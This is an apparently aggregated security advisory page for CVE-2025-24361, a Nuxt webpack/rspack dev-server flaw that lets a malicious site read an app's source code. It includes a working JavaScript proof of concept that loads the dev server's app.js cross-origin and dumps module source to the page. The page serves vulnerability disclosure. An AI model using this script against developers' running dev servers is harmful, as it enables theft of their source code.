🛡️ CVE-2025-24361 — rspack-builder
Description
Opening a malicious website while running a Nuxt dev server could allow read-only access to code
Summary
Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.
Details
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script.
By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.
PoC
1. Create a nuxt project with webpack / rspack builder.
1. Run npm run dev
1. Open http://localhost:3000
1. Run the script below in a web site that has a different origin.
1. You can see the source code output in the document and the devtools console.
```js
const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
for (const page in window.webpackChunknuxt_app) {
const moduleList = window.webpackChunknuxt_app[page][1]
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const code = document.createElement('code')
code.textContent = moduleList[key].toString()
p.append(title, ':', document.createElement('br'), code)
document.body.appendChild(p)
}
}
})
document.head.appendChild(script)
```

It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the sourcesContent field).
Impact
Users using webpack / rspack builder may get the source code stolen by malicious websites.
How this vulnerability can be exploited
This issue can be reached over the network, attack complexity is high, an attacker needs no privileges on the target. A user must be tricked into taking some action. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality high, integrity none, availability none.
Weakness class
CVE-2025-24361 is classified as CWE-749: Exposed Dangerous Method or Function. A powerful method is reachable by callers who should not be able to invoke it.
Affected software
CVE-2025-24361 is recorded against 3 packages.
- @nuxt/rspack-builder
- @nuxt/webpack-builder
- unknown
Timeline and source
Published on 27 January 2025 and last revised on 8 July 2026. No public exploit is currently recorded for this entry. Record sourced from NVD.
References
github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Package)
Details
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
Affected Packages
| Software | From version | Fixed in |
|---|---|---|
| @nuxt/rspack-builder | — | — |
| @nuxt/webpack-builder | — | — |
| unknown | — | — |
References
Similar Threats
- Unknown CLSA-2026-1775867597
- Unknown CLSA-2026-1779238045
- Unknown CLSA-2026-1783558975
- Unknown CLSA-2026-1784077494
- Medium CVE-2026-49993
Vulnerability Monitoring
Track new vulnerabilities in rspack-builder
CVE-2025-24361 is rated CVSS 5.3 Medium. BotEraser monitors your WordPress installation and notifies you when software you use appears in our vulnerability database.
Set Up Free Alerts →No credit card required · Results in minutes
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.